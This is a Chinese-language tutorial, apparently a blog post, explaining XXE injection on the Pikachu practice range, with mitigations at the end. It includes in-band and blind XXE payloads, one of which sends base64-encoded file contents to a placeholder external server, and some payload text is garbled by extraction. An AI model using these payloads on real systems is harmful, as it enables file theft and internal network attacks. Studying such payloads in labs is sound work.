WEB漏洞——XXE&XML

先上小迪的思维导图
WEB漏洞——XXE&XML_第1张图片概念
XML:传输和存储数据格式类型
XXE:XML外部实体注入漏洞(XML External Entity Injection)

XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。

WEB漏洞——XXE&XML_第2张图片上图中的DTD是实体,DTD中的内容就是内部实体的一个声明,图中声明了note作为一个父标签,其中to,from…是note的子标签。

WEB漏洞——XXE&XML_第3张图片
而这张图便是DTD外部实体声明,外部有一个.dtd文件通过SYSTEM"**.dtd"来引用

有回显XXE

通过外部实体我们可以去读取相关文件,拿pikachu靶场说明
首先在我的D盘中创建了一个1.txt的文件
WEB漏洞——XXE&XML_第4张图片我们编辑好XML文档声明:


DOCTYPE ANY[
  
 //!ENTITY xxe 可以理解为xxe就是代表后面SYSTEM引用的文件
 //file:理解为file协议,也可以用其他协议,如http、ftp等实现相关的功能,
 //SYSTEM后面必须跟文件
]>
<x>&xxe;x>
//这里将xxe的内容通过标签显示

复制到靶场中
WEB漏洞——XXE&XML_第5张图片可以得到1.txt中的内容
WEB漏洞——XXE&XML_第6张图片

无回显XXE

还是用Pikachu靶场,这里我们要修改下源代码,使其不回显
在vul/xxe/xxe_1.php中将 "echo $html"注释掉,可复现无回显的情况
WEB漏洞——XXE&XML_第7张图片
无回显payload


DOCTYPE test[
//读取文件
//访问url里xx.dtd文件,xx.dtd文件内容在下方
//这里url填自己本地的xx.dtd文件
%dtd;
%send;
]>



xx.dtd中内容:
% send SYSTEM
'http://xxx.xxx.xx.xx:xx/?data=%file;'>"
>
%payload;

将上述payload放入靶场中,在xx.dtd文件里设置的url服务器日志中可查看回显结果
WEB漏洞——XXE&XML_第8张图片
在这里插入图片描述将base64解密,即可得到d://xx.txt的文件内容
WEB漏洞——XXE&XML_第9张图片

发现XEE

这里主要说黑盒测试,主要以下几点:
1.根据数据格式类型判断:testHello
2.根据数据包中Content-Type值判断:如有text/xml、application/xml
3.更改Content-Type值看返回(盲猜),再把攻击语句写进数据包测试
4.做个脚本小子,用工具:附链接https://www.cnblogs.com/bmjoker/p/9614990.html

XXE修复

xxe漏洞修复与防御方案-php、Java、python-过滤及禁用
方案一:禁用外部实体 比如设置PHP:libxml_disable_entity_loader(true); ,其他语言百度搜索
方案二:过滤用户提交的XML数据 过滤关键词:

你可能感兴趣的:(web安全)